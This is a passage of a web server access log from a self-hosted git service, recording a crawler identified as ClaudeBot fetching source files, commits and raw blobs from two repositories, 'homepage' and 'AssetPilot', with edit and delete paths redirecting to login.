"/windpacer/homepage/_diffpatch/main/npm/data/nginx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/js/script.js" -[15/Feb/2026:13:16:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/nginx" -[15/Feb/2026:13:16:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/nginx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12" [Client 216.73.216.188] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json" [Client 216.73.216.188] [Length 9861] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts" [Client 216.73.216.188] [Length 13141] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx" [Client 216.73.216.188] [Length 14190] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx" [Client 216.73.216.188] [Length 16465] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py?display=rendered" [Client 216.73.216.188] [Length 10969] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/nginx" -[15/Feb/2026:13:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12" [Client 216.73.216.188] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/nginx/proxy_host/1.conf" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx" [Client 216.73.216.188] [Length 13923] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/database.sqlite" [Client 216.73.216.188] [Length 10123] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/nginx/proxy_host/1.conf" -[15/Feb/2026:13:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/css/style.css" [Client 216.73.216.188] [Length 1060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md?display=source" [Client 216.73.216.188] [Length 20911] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx" [Client 216.73.216.188] [Length 13874] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" [Client 216.73.216.188] [Length 43840] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html" [Client 216.73.216.188] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/types.ts" [Client 216.73.216.188] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html?display=source" [Client 216.73.216.188] [Length 31030] [Gzip 9.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js" [Client 216.73.216.188] [Length 10195] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py" [Client 216.73.216.188] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py" [Client 216.73.216.188] [Length 21527] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx" [Client 216.73.216.188] [Length 14653] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js" [Client 216.73.216.188] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py" [Client 216.73.216.188] [Length 4934] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json" [Client 216.73.216.188] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/nginx/proxy_host/1.conf" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/nginx/proxy_host/1.conf" -[15/Feb/2026:13:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html" [Client 216.73.216.188] [Length 5799] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile" [Client 216.73.216.188] [Length 12449] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json" [Client 216.73.216.188] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js" [Client 216.73.216.188] [Length 1659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/database.sqlite" [Client 216.73.216.188] [Length 159744] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py?display=source" [Client 216.73.216.188] [Length 13097] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json?display=source" [Client 216.73.216.188] [Length 11684] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components" [Client 216.73.216.188] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app" [Client 216.73.216.188] [Length 10496] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12?display=source" [Client 216.73.216.188] [Length 11096] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js" [Client 216.73.216.188] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx" [Client 216.73.216.188] [Length 14807] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html?display=source" [Client 216.73.216.188] [Length 15743] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/css" [Client 216.73.216.188] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json" [Client 216.73.216.188] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js?display=source" [Client 216.73.216.188] [Length 27457] [Gzip 7.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3" [Client 216.73.216.188] [Length 9968] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py?display=source" [Client 216.73.216.188] [Length 16656] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json?display=source" [Client 216.73.216.188] [Length 11284] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3" [Client 216.73.216.188] [Length 16] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" [Client 216.73.216.188] [Length 22719] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json" [Client 216.73.216.188] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/types.ts" [Client 216.73.216.188] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/database.sqlite?display=rendered" [Client 216.73.216.188] [Length 10842] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json?display=rendered" [Client 216.73.216.188] [Length 10878] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12?display=rendered" [Client 216.73.216.188] [Length 11034] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py?display=rendered" [Client 216.73.216.188] [Length 10971] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/css" [Client 216.73.216.188] [Length 10136] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx" [Client 216.73.216.188] [Length 16464] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json?display=source" [Client 216.73.216.188] [Length 11865] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx" [Client 216.73.216.188] [Length 14188] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md?display=source" [Client 216.73.216.188] [Length 15189] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates" [Client 216.73.216.188] [Length 10010] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx" [Client 216.73.216.188] [Length 13923] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx" [Client 216.73.216.188] [Length 13867] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html?display=rendered" [Client 216.73.216.188] [Length 10974] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json?display=rendered" [Client 216.73.216.188] [Length 10874] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/types.ts" [Client 216.73.216.188] [Length 302] 